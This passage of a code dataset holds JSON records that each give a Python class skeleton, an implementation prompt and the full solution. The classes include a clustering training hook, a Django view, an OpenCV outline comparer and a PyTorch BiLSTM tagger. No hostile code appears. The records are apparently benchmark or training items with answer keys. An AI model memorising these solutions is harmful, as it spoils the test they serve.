gmm_input_slice], axis=0)\n tfl.info('GMM data accumulation done at local step {} with {} samples.'.format(step, len(self.gmm_data)))\n if is_final:\n np.random.shuffle(self.gmm_data)\n kmeans = cluster.KMeans(n_clusters=self.hps.numCluster, random_state=0)\n kmeans.fit(self.gmm_data)\n session.run(self.update_svdc_with_kmeans_ops, feed_dict={self.mu: kmeans.cluster_centers_.T})\n skgmm = mixture.GaussianMixture(n_components=self.hps.numCluster, covariance_type='diag', max_iter=10000, means_init=kmeans.cluster_centers_, random_state=100)\n skgmm.fit(self.gmm_data)\n session.run(self.update_svdc_with_gmm_ops, feed_dict={self.sigma: skgmm.covariances_.T})\n self.gmm_data = None\n tfl.info('GMM init done at local step {} with momentum factor {}'.format(step, session.run(self.mtm)))\n session.run(self.utils['incr_gs_step'])\n\n def before_run(self, run_context: tfe.SessionRunContext) -> None:\n \"\"\"The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.\"\"\"\n session = run_context.session\n gs = tf.train.global_step(session, self.utils['global_step'])\n if gs == 0:\n tfl.info('S3VDC training begin at global step 1.')\n session.run(self.utils['incr_gs_step'])\n return\n if gs == self.max_steps - 1:\n tfl.info('S3VDC training end at global step {} with latent annealing factor {}.'.format(gs, session.run(self.vgmm['anneal_factor'])))\n gs_offset = gs - self.gamma_gmm_training_steps\n if gs_offset <= 0:\n if gs_offset <= -1.0 * self.gmm_steps:\n if gs_offset == 1 - self.gamma_gmm_training_steps:\n tfl.info('Gamma training begin at global step {}'.format(gs))\n session.run(self.vgmm['gamma_training_op'])\n else:\n self.skl_init(session, gs_offset)\n else:\n cyc_step = gs_offset % self.svdc_gmm_finetune_steps\n cyc_id = gs_offset // self.svdc_gmm_finetune_steps + 1\n if cyc_step > 0 and cyc_step <= self.beta_steps:\n if cyc_step == 1:\n tfl.info('PERIOD {}: Beta annealing begin at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n elif cyc_step == 
self.beta_steps:\n tfl.info('PERIOD {}: Beta annealing end at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n session.run(self.vgmm['svdc_finetune_op'])\n else:\n session.run(self.vgmm['svdc_static_train_op'])\n", "source": "the_stack_v2_python_sparse", "source_path": "lib/user_custom_model.py", "source_repo": "tmaone/s3vdc", "split": "test", "star_events_count": 0} {"blob_id": "4f51ba70cd17e7ea066e3b74500aadc79888c259", "bodies": ["form = ServiceForm()\nservice_obj = models.Services.objects.all().order_by('-id')\nowner_obj = models.User.objects.values('id', 'username')\nreturn render(request, 'host/service_line.html', {'form': form, 'service_obj': service_obj, 'owner_obj': owner_obj})", "username = request.session.get('user_info')['username']\nresponse = {'status': True, 'data': None, 'msg': None}\nprint(request.POST)\nprint(request.POST.get('owner_id'))\nform = ServiceForm(data=request.POST)\nif form.is_valid():\n print(form.cleaned_data)\n owner_id_list = form.cleaned_data.pop('owner_id')\n obj = models.Services.objects.create(**form.cleaned_data)\n obj.owner.add(*owner_id_list)\n log.logger.info('username:{},Add service line info: name:{},idc_id:{}'.format(username, form.cleaned_data['name'], form.cleaned_data['idc_id']))\nelse:\n print(form.errors)\n response['status'] = False\n response['msg'] = form.errors\nreturn HttpResponse(json.dumps(response))"], "bodies_text": "<|body_start_0|>\n form = ServiceForm()\n service_obj = models.Services.objects.all().order_by('-id')\n owner_obj = models.User.objects.values('id', 'username')\n return render(request, 'host/service_line.html', {'form': form, 'service_obj': service_obj, 'owner_obj': owner_obj})\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.session.get('user_info')['username']\n response = {'status': True, 'data': None, 'msg': None}\n print(request.POST)\n print(request.POST.get('owner_id'))\n form = ServiceForm(data=request.POST)\n if form.is_valid():\n print(form.cleaned_data)\n owner_id_list = form.cleaned_data.pop('owner_id')\n obj = models.Services.objects.create(**form.cleaned_data)\n obj.owner.add(*owner_id_list)\n log.logger.info('username:{},Add service line info: name:{},idc_id:{}'.format(username, form.cleaned_data['name'], form.cleaned_data['idc_id']))\n else:\n print(form.errors)\n response['status'] = False\n response['msg'] = form.errors\n return HttpResponse(json.dumps(response))\n<|end_body_1|>\n", "class_docstring": "业务线视图函数", "class_name": "ServiceLineView", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ServiceLineView:\n \"\"\"业务线视图函数\"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"展示业务线信息 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_0|>\n\n def post(self, request, *args, **kwargs):\n \"\"\"新建业务线 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form = ServiceForm()\n service_obj = models.Services.objects.all().order_by('-id')\n owner_obj = models.User.objects.values('id', 'username')\n return render(request, 'host/service_line.html', {'form': form, 'service_obj': service_obj, 'owner_obj': owner_obj})\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.session.get('user_info')['username']\n response = {'status': True, 'data': None, 'msg': None}\n print(request.POST)\n print(request.POST.get('owner_id'))\n form = ServiceForm(data=request.POST)\n if form.is_valid():\n 
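# --- Editor's aside (not part of the JSON records around this line) ---------
# The S3VDCHook record that closes here drives training purely by global-step
# arithmetic: `gamma_steps` of gamma pretraining, `gmm_steps` spent pooling
# z_mu batches and initialising the GMM (sklearn KMeans means, then a diagonal
# GaussianMixture for variances, blended into the TF variables with momentum
# (1 - anneal_factor)^3), then repeating cycles of `beta_steps` of beta
# annealing plus `static_steps` of static training. A framework-free sketch of
# just the phase arithmetic; the function and phase names are illustrative:
def s3vdc_phase(gs, gamma_steps, gmm_steps, beta_steps, static_steps):
    offset = gs - (gamma_steps + gmm_steps)
    if offset <= 0:
        # mirrors `gs_offset <= -1.0 * self.gmm_steps` in before_run above
        return 'gamma' if offset <= -gmm_steps else 'gmm_init'
    cyc_step = offset % (beta_steps + static_steps)
    return 'beta_anneal' if 0 < cyc_step <= beta_steps else 'static'

# With gamma=10, gmm=5, beta=3, static=2: steps 1-10 train gamma, 11-15 run
# GMM init, then every 5-step cycle is 3 annealing steps + 2 static steps.
assert s3vdc_phase(10, 10, 5, 3, 2) == 'gamma'
assert s3vdc_phase(12, 10, 5, 3, 2) == 'gmm_init'
assert s3vdc_phase(16, 10, 5, 3, 2) == 'beta_anneal'
assert s3vdc_phase(20, 10, 5, 3, 2) == 'static'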
print(form.cleaned_data)\n owner_id_list = form.cleaned_data.pop('owner_id')\n obj = models.Services.objects.create(**form.cleaned_data)\n obj.owner.add(*owner_id_list)\n log.logger.info('username:{},Add service line info: name:{},idc_id:{}'.format(username, form.cleaned_data['name'], form.cleaned_data['idc_id']))\n else:\n print(form.errors)\n response['status'] = False\n response['msg'] = form.errors\n return HttpResponse(json.dumps(response))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000310", "length_bytes": 7092, "license_type": "no_license", "methods": [{"docstring": "展示业务线信息 :param request: :param args: :param kwargs: :return:", "name": "get", "signature": "def get(self, request, *args, **kwargs)"}, {"docstring": "新建业务线 :param request: :param args: :param kwargs: :return:", "name": "post", "signature": "def post(self, request, *args, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002626", "prompt": "Implement the Python class `ServiceLineView` described below.\n\nClass description:\n业务线视图函数\n\nMethod signatures and docstrings:\n- def get(self, request, *args, **kwargs): 展示业务线信息 :param request: :param args: :param kwargs: :return:\n- def post(self, request, *args, **kwargs): 新建业务线 :param request: :param args: :param kwargs: :return:", "prompted_full_text": "Implement the Python class `ServiceLineView` described below.\n\nClass description:\n业务线视图函数\n\nMethod signatures and docstrings:\n- def get(self, request, *args, **kwargs): 展示业务线信息 :param request: :param args: :param kwargs: :return:\n- def post(self, request, *args, **kwargs): 新建业务线 :param request: :param args: :param kwargs: :return:\n\n<|skeleton|>\nclass ServiceLineView:\n \"\"\"业务线视图函数\"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"展示业务线信息 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_0|>\n\n def post(self, request, *args, **kwargs):\n \"\"\"新建业务线 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form = ServiceForm()\n service_obj = models.Services.objects.all().order_by('-id')\n owner_obj = models.User.objects.values('id', 'username')\n return render(request, 'host/service_line.html', {'form': form, 'service_obj': service_obj, 'owner_obj': owner_obj})\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.session.get('user_info')['username']\n response = {'status': True, 'data': None, 'msg': None}\n print(request.POST)\n print(request.POST.get('owner_id'))\n form = ServiceForm(data=request.POST)\n if form.is_valid():\n print(form.cleaned_data)\n owner_id_list = form.cleaned_data.pop('owner_id')\n obj = models.Services.objects.create(**form.cleaned_data)\n obj.owner.add(*owner_id_list)\n log.logger.info('username:{},Add service line info: name:{},idc_id:{}'.format(username, form.cleaned_data['name'], form.cleaned_data['idc_id']))\n else:\n print(form.errors)\n response['status'] = False\n response['msg'] = form.errors\n return HttpResponse(json.dumps(response))\n<|end_body_1|>\n", "revision_id": "5ead7c54c73fc3a1ba02cd77d675997cf5c36e12", "skeleton": "<|skeleton|>\nclass ServiceLineView:\n \"\"\"业务线视图函数\"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"展示业务线信息 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_0|>\n\n def post(self, request, *args, **kwargs):\n \"\"\"新建业务线 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": 
"data/stack_v2_sparse_classes_30k", "solution": "class ServiceLineView:\n \"\"\"业务线视图函数\"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"展示业务线信息 :param request: :param args: :param kwargs: :return:\"\"\"\n form = ServiceForm()\n service_obj = models.Services.objects.all().order_by('-id')\n owner_obj = models.User.objects.values('id', 'username')\n return render(request, 'host/service_line.html', {'form': form, 'service_obj': service_obj, 'owner_obj': owner_obj})\n\n def post(self, request, *args, **kwargs):\n \"\"\"新建业务线 :param request: :param args: :param kwargs: :return:\"\"\"\n username = request.session.get('user_info')['username']\n response = {'status': True, 'data': None, 'msg': None}\n print(request.POST)\n print(request.POST.get('owner_id'))\n form = ServiceForm(data=request.POST)\n if form.is_valid():\n print(form.cleaned_data)\n owner_id_list = form.cleaned_data.pop('owner_id')\n obj = models.Services.objects.create(**form.cleaned_data)\n obj.owner.add(*owner_id_list)\n log.logger.info('username:{},Add service line info: name:{},idc_id:{}'.format(username, form.cleaned_data['name'], form.cleaned_data['idc_id']))\n else:\n print(form.errors)\n response['status'] = False\n response['msg'] = form.errors\n return HttpResponse(json.dumps(response))\n", "source": "the_stack_v2_python_sparse", "source_path": "warship/host/views/service.py", "source_repo": "shuke163/learnpy", "split": "test", "star_events_count": 1} {"blob_id": "adf2414bf67dd17b494b72bb24106ec1192b8ae6", "bodies": ["self.compare_angle = None\nself._centroid_vectors = None\nself.ref_curve = self._calc_dist_curve(training_mask)\nself._ref_angle = np.arctan2(*self._centroid_vectors[0])", "input_curve = self._calc_dist_curve(query_mask)\ncost_landscape = np.abs(self.ref_curve[:, None] - input_curve[None, :])\nn_eval = min(500, self.ref_curve.size, input_curve.size)\nref_idx = vt.intr(np.linspace(0, self.ref_curve.size - 1, n_eval))\nnew_idx = vt.intr(np.linspace(0, input_curve.size - 1, n_eval))\nnew_offsets = vt.intr(np.linspace(0, input_curve.size - 1, 101))[:-1]\nnew_idx_all = (new_idx[:, None] + new_offsets[None, :]) % input_curve.size\nmean_dist = cost_landscape[ref_idx[:, None], new_idx_all].mean(axis=0)\nself.compare_angle = self._ref_angle - np.arctan2(*self._centroid_vectors[new_offsets[mean_dist.argmin()]])\nreturn mean_dist.min()", "areas_num, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))\nassert areas_num == 2, 'Multiple blobs in mask'\ncontours, hierarchy = cv2.findContours(mask.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\ncontour = np.squeeze(np.vstack(contours))\ncentroid_uv = vt.uv_centroid(mask)\nself._centroid_vectors = contour - centroid_uv\nreturn np.linalg.norm(self._centroid_vectors, axis=1)"], "bodies_text": "<|body_start_0|>\n self.compare_angle = None\n self._centroid_vectors = None\n self.ref_curve = self._calc_dist_curve(training_mask)\n self._ref_angle = np.arctan2(*self._centroid_vectors[0])\n<|end_body_0|>\n\n<|body_start_1|>\n input_curve = self._calc_dist_curve(query_mask)\n cost_landscape = np.abs(self.ref_curve[:, None] - input_curve[None, :])\n n_eval = min(500, self.ref_curve.size, input_curve.size)\n ref_idx = vt.intr(np.linspace(0, self.ref_curve.size - 1, n_eval))\n new_idx = vt.intr(np.linspace(0, input_curve.size - 1, n_eval))\n new_offsets = vt.intr(np.linspace(0, input_curve.size - 1, 101))[:-1]\n new_idx_all = (new_idx[:, None] + new_offsets[None, :]) % input_curve.size\n mean_dist = cost_landscape[ref_idx[:, None], 
new_idx_all].mean(axis=0)\n self.compare_angle = self._ref_angle - np.arctan2(*self._centroid_vectors[new_offsets[mean_dist.argmin()]])\n return mean_dist.min()\n<|end_body_1|>\n\n<|body_start_2|>\n areas_num, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))\n assert areas_num == 2, 'Multiple blobs in mask'\n contours, hierarchy = cv2.findContours(mask.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contour = np.squeeze(np.vstack(contours))\n centroid_uv = vt.uv_centroid(mask)\n self._centroid_vectors = contour - centroid_uv\n return np.linalg.norm(self._centroid_vectors, axis=1)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "OutlineComparer", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OutlineComparer:\n\n def __init__(self, training_mask):\n \"\"\"Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\"\"\"\n <|body_0|>\n\n def outline_distance(self, query_mask):\n \"\"\"Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\"\"\"\n <|body_1|>\n\n def _calc_dist_curve(self, mask):\n \"\"\"Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. 
:rtype: np.ndarray\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.compare_angle = None\n self._centroid_vectors = None\n self.ref_curve = self._calc_dist_curve(training_mask)\n self._ref_angle = np.arctan2(*self._centroid_vectors[0])\n<|end_body_0|>\n\n<|body_start_1|>\n input_curve = self._calc_dist_curve(query_mask)\n cost_landscape = np.abs(self.ref_curve[:, None] - input_curve[None, :])\n n_eval = min(500, self.ref_curve.size, input_curve.size)\n ref_idx = vt.intr(np.linspace(0, self.ref_curve.size - 1, n_eval))\n new_idx = vt.intr(np.linspace(0, input_curve.size - 1, n_eval))\n new_offsets = vt.intr(np.linspace(0, input_curve.size - 1, 101))[:-1]\n new_idx_all = (new_idx[:, None] + new_offsets[None, :]) % input_curve.size\n mean_dist = cost_landscape[ref_idx[:, None], new_idx_all].mean(axis=0)\n self.compare_angle = self._ref_angle - np.arctan2(*self._centroid_vectors[new_offsets[mean_dist.argmin()]])\n return mean_dist.min()\n<|end_body_1|>\n\n<|body_start_2|>\n areas_num, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))\n assert areas_num == 2, 'Multiple blobs in mask'\n contours, hierarchy = cv2.findContours(mask.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contour = np.squeeze(np.vstack(contours))\n centroid_uv = vt.uv_centroid(mask)\n self._centroid_vectors = contour - centroid_uv\n return np.linalg.norm(self._centroid_vectors, axis=1)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000311", "length_bytes": 22952, "license_type": "no_license", "methods": [{"docstring": "Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray", "name": "__init__", "signature": "def __init__(self, training_mask)"}, {"docstring": "Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float", "name": "outline_distance", "signature": "def outline_distance(self, query_mask)"}, {"docstring": "Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray", "name": "_calc_dist_curve", "signature": "def _calc_dist_curve(self, mask)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001374", "prompt": "Implement the Python class `OutlineComparer` described below.\n\nClass description:\nImplement the OutlineComparer class.\n\nMethod signatures and docstrings:\n- def __init__(self, training_mask): Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\n- def outline_distance(self, query_mask): Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. 
:param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\n- def _calc_dist_curve(self, mask): Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray", "prompted_full_text": "Implement the Python class `OutlineComparer` described below.\n\nClass description:\nImplement the OutlineComparer class.\n\nMethod signatures and docstrings:\n- def __init__(self, training_mask): Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\n- def outline_distance(self, query_mask): Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\n- def _calc_dist_curve(self, mask): Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray\n\n<|skeleton|>\nclass OutlineComparer:\n\n def __init__(self, training_mask):\n \"\"\"Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\"\"\"\n <|body_0|>\n\n def outline_distance(self, query_mask):\n \"\"\"Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\"\"\"\n <|body_1|>\n\n def _calc_dist_curve(self, mask):\n \"\"\"Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. 
:rtype: np.ndarray\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.compare_angle = None\n self._centroid_vectors = None\n self.ref_curve = self._calc_dist_curve(training_mask)\n self._ref_angle = np.arctan2(*self._centroid_vectors[0])\n<|end_body_0|>\n\n<|body_start_1|>\n input_curve = self._calc_dist_curve(query_mask)\n cost_landscape = np.abs(self.ref_curve[:, None] - input_curve[None, :])\n n_eval = min(500, self.ref_curve.size, input_curve.size)\n ref_idx = vt.intr(np.linspace(0, self.ref_curve.size - 1, n_eval))\n new_idx = vt.intr(np.linspace(0, input_curve.size - 1, n_eval))\n new_offsets = vt.intr(np.linspace(0, input_curve.size - 1, 101))[:-1]\n new_idx_all = (new_idx[:, None] + new_offsets[None, :]) % input_curve.size\n mean_dist = cost_landscape[ref_idx[:, None], new_idx_all].mean(axis=0)\n self.compare_angle = self._ref_angle - np.arctan2(*self._centroid_vectors[new_offsets[mean_dist.argmin()]])\n return mean_dist.min()\n<|end_body_1|>\n\n<|body_start_2|>\n areas_num, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))\n assert areas_num == 2, 'Multiple blobs in mask'\n contours, hierarchy = cv2.findContours(mask.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contour = np.squeeze(np.vstack(contours))\n centroid_uv = vt.uv_centroid(mask)\n self._centroid_vectors = contour - centroid_uv\n return np.linalg.norm(self._centroid_vectors, axis=1)\n<|end_body_2|>\n", "revision_id": "457d839a4ae5401c76a46616c622f2728f56f25b", "skeleton": "<|skeleton|>\nclass OutlineComparer:\n\n def __init__(self, training_mask):\n \"\"\"Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\"\"\"\n <|body_0|>\n\n def outline_distance(self, query_mask):\n \"\"\"Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. :param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\"\"\"\n <|body_1|>\n\n def _calc_dist_curve(self, mask):\n \"\"\"Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OutlineComparer:\n def __init__(self, training_mask):\n \"\"\"Create object for comparing blobs/connected components outlines, meaning if same geometrical outline, including rotation, then the outline distance will be small. :param training_mask: Binary mask with a single blob to use as the reference/training object. :type training_mask: np.ndarray\"\"\"\n self.compare_angle = None\n self._centroid_vectors = None\n self.ref_curve = self._calc_dist_curve(training_mask)\n self._ref_angle = np.arctan2(*self._centroid_vectors[0])\n\n def outline_distance(self, query_mask):\n \"\"\"Compare query blob to reference blob in terms of average contour distance. Further, an approximate angle difference is determined. 
:param query_mask: Binary mask with a single blob to compare against reference blob :type query_mask: np.ndarray :return: The average pixel distance between query blob and reference blob :rtype: float\"\"\"\n input_curve = self._calc_dist_curve(query_mask)\n cost_landscape = np.abs(self.ref_curve[:, None] - input_curve[None, :])\n n_eval = min(500, self.ref_curve.size, input_curve.size)\n ref_idx = vt.intr(np.linspace(0, self.ref_curve.size - 1, n_eval))\n new_idx = vt.intr(np.linspace(0, input_curve.size - 1, n_eval))\n new_offsets = vt.intr(np.linspace(0, input_curve.size - 1, 101))[:-1]\n new_idx_all = (new_idx[:, None] + new_offsets[None, :]) % input_curve.size\n mean_dist = cost_landscape[ref_idx[:, None], new_idx_all].mean(axis=0)\n self.compare_angle = self._ref_angle - np.arctan2(*self._centroid_vectors[new_offsets[mean_dist.argmin()]])\n return mean_dist.min()\n\n def _calc_dist_curve(self, mask):\n \"\"\"Calculate the distance from mask centroid to each contour pixel. :param mask: Binary mask with a single blob to calculate distance curve for :type mask: np.ndarray :return: Distance curve. :rtype: np.ndarray\"\"\"\n areas_num, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))\n assert areas_num == 2, 'Multiple blobs in mask'\n contours, hierarchy = cv2.findContours(mask.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contour = np.squeeze(np.vstack(contours))\n centroid_uv = vt.uv_centroid(mask)\n self._centroid_vectors = contour - centroid_uv\n return np.linalg.norm(self._centroid_vectors, axis=1)\n", "source": "the_stack_v2_python_sparse", "source_path": "AdvancedVisionTools.py", "source_repo": "AndersDHenriksen/Vision", "split": "test", "star_events_count": 0} {"blob_id": "cd2ec1b23043295195dbac9f687b99f2f27efad6", "bodies": ["super(NerBiLstmModel, self).__init__()\nself.config = config\nself._max_length = min(config.max_length, helper.max_length)\nself._dropout = torch.nn.Dropout(config.dropout)\nself._embeddings = torch.nn.Embedding.from_pretrained(pretrained_embeddings, freeze=False)\nself._nerbilstm = torch.nn.LSTM(input_size=config.embed_size * config.n_features, hidden_size=config.hidden_size // 2, batch_first=True, bidirectional=True)\nself._hidden2tag = torch.nn.Linear(in_features=config.hidden_size, out_features=config.n_classes)", "batch_size, seq_length = (sentences.shape[0], sentences.shape[1])\nsentences_embeddings = sentences.long().view((batch_size, seq_length * self.config.n_features))\nsentences_embeddings_reshaped = self._embeddings(sentences_embeddings).view(batch_size, seq_length, -1)\nsentences_embeddings_dropout = self._dropout(sentences_embeddings_reshaped)\nnerbilstm_output, _ = self._nerbilstm(sentences_embeddings_dropout)\nnerbilstm_dropout_output = self._dropout(nerbilstm_output)\nlinear_output = self._hidden2tag(nerbilstm_dropout_output)\ntag_probs = torch.nn.functional.log_softmax(linear_output, dim=2)\nreturn tag_probs"], "bodies_text": "<|body_start_0|>\n super(NerBiLstmModel, self).__init__()\n self.config = config\n self._max_length = min(config.max_length, helper.max_length)\n self._dropout = torch.nn.Dropout(config.dropout)\n self._embeddings = torch.nn.Embedding.from_pretrained(pretrained_embeddings, freeze=False)\n self._nerbilstm = torch.nn.LSTM(input_size=config.embed_size * config.n_features, hidden_size=config.hidden_size // 2, batch_first=True, bidirectional=True)\n self._hidden2tag = torch.nn.Linear(in_features=config.hidden_size, 
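# --- Editor's aside (not part of the JSON records around this line) ---------
# The OutlineComparer record that closes here turns each blob into a 1-D
# "signature" (centroid-to-contour distance per boundary pixel) and makes the
# comparison rotation-tolerant by trying ~100 circular shifts of the query
# signature, keeping the shift with the smallest mean absolute difference and
# recovering an approximate rotation angle from it. A NumPy-only sketch of
# that circular matching step; here both curves are resampled by linear
# interpolation, whereas the record subsamples indices directly.
import numpy as np

def outline_distance(ref_curve, query_curve, n_eval=500, n_shifts=100):
    n = min(n_eval, ref_curve.size, query_curve.size)
    grid = np.linspace(0.0, 1.0, n)
    ref = np.interp(grid, np.linspace(0.0, 1.0, ref_curve.size), ref_curve)
    qry = np.interp(grid, np.linspace(0.0, 1.0, query_curve.size), query_curve)
    # mean |difference| for each candidate circular shift of the query curve
    shifts = np.linspace(0, n, n_shifts, endpoint=False).astype(int)
    dists = [np.abs(ref - np.roll(qry, s)).mean() for s in shifts]
    best = int(np.argmin(dists))
    return dists[best], shifts[best]   # distance plus the winning shift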
out_features=config.n_classes)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size, seq_length = (sentences.shape[0], sentences.shape[1])\n sentences_embeddings = sentences.long().view((batch_size, seq_length * self.config.n_features))\n sentences_embeddings_reshaped = self._embeddings(sentences_embeddings).view(batch_size, seq_length, -1)\n sentences_embeddings_dropout = self._dropout(sentences_embeddings_reshaped)\n nerbilstm_output, _ = self._nerbilstm(sentences_embeddings_dropout)\n nerbilstm_dropout_output = self._dropout(nerbilstm_output)\n linear_output = self._hidden2tag(nerbilstm_dropout_output)\n tag_probs = torch.nn.functional.log_softmax(linear_output, dim=2)\n return tag_probs\n<|end_body_1|>\n", "class_docstring": "Implements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. Henry) using a featurized window around the token.", "class_name": "NerBiLstmModel", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NerBiLstmModel:\n \"\"\"Implements a BiLSTM network with an embedding layer and single hidden layer. This network will predict a sequence of labels (e.g. PER) for a given token (e.g. Henry) using a featurized window around the token.\"\"\"\n\n def __init__(self, helper, config, pretrained_embeddings):\n \"\"\"TODO: - Initialize the layer of the models: - *Unfrozen* embeddings of shape (V, D) which are loaded with pre-trained weights (`pretrained_embeddings`) - BiLSTM layer with hidden size of H/2 per direction - Linear layer with output of shape C Where: V - size of the vocabulary D - size of a word embedding H - size of the hidden layer C - number of classes being predicted Hints: - For the input dimension of the BiLSTM, think about the size of an embedded word representation\"\"\"\n <|body_0|>\n\n def forward(self, sentences):\n \"\"\"TODO: - Perform the forward pass of the model, according to the model description in the handout: 1. Get the embeddings of the input 2. Apply dropout on the output of 1 3. Pass the output of 2 through the BiLSTM layer 4. Apply dropout on the output of 3 5. Pass the output of 4 through the linear layer 6. Perform softmax on the output of 5 to get tag_probs Hints: - Reshape the output of the embeddings layer so the full representation of an embedded word fits in one dimension. You might find the .view method of a tensor helpful. 
Args: - sentences: The input tensor of shape (batch_size, max_length, n_features) Returns: - tag_probs: A tensor of shape (batch_size, max_length, n_classes) which rep\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(NerBiLstmModel, self).__init__()\n self.config = config\n self._max_length = min(config.max_length, helper.max_length)\n self._dropout = torch.nn.Dropout(config.dropout)\n self._embeddings = torch.nn.Embedding.from_pretrained(pretrained_embeddings, freeze=False)\n self._nerbilstm = torch.nn.LSTM(input_size=config.embed_size * config.n_features, hidden_size=config.hidden_size // 2, batch_first=True, bidirectional=True)\n self._hidden2tag = torch.nn.Linear(in_features=config.hidden_size, out_features=config.n_classes)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size, seq_length = (sentences.shape[0], sentences.shape[1])\n sentences_embeddings = sentences.long().view((batch_size, seq_length * self.config.n_features))\n sentences_embeddings_reshaped = self._embeddings(sentences_embeddings).view(batch_size, seq_length, -1)\n sentences_embeddings_dropout = 